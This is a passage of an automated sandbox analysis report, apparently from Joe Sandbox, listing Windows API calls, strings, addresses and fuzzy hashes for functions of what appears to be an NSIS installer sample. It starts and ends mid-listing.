                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                                                                                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                                • String ID: 9
                                                                                                                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                                                                                                                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                                                                                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                                                                • CharNextW.USER32(?,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 589700163-2977677972
                                                                                                                                                                                                                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                                                                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 00404E77
                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                                                                                • MulDiv.KERNEL32(000982BC,00000064,?), ref: 00402FDC
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00402FEC
                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                                                                                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                                                                                                                • Opcode ID: 957086ae536bb294dd6adae5a390716f3e942711b1f423d683cc90498c24e783
                                                                                                                                                                                                                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 957086ae536bb294dd6adae5a390716f3e942711b1f423d683cc90498c24e783
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AE4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 3449924974-3355392842
                                                                                                                                                                                                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1354259210-0
                                                                                                                                                                                                                                • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                                                                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                                                                                                                                • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2584051700-0
                                                                                                                                                                                                                                • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                                                                                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                                                                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                                                                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                                                                                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 3248276644-3355392842
                                                                                                                                                                                                                                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                                                                                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405542
                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
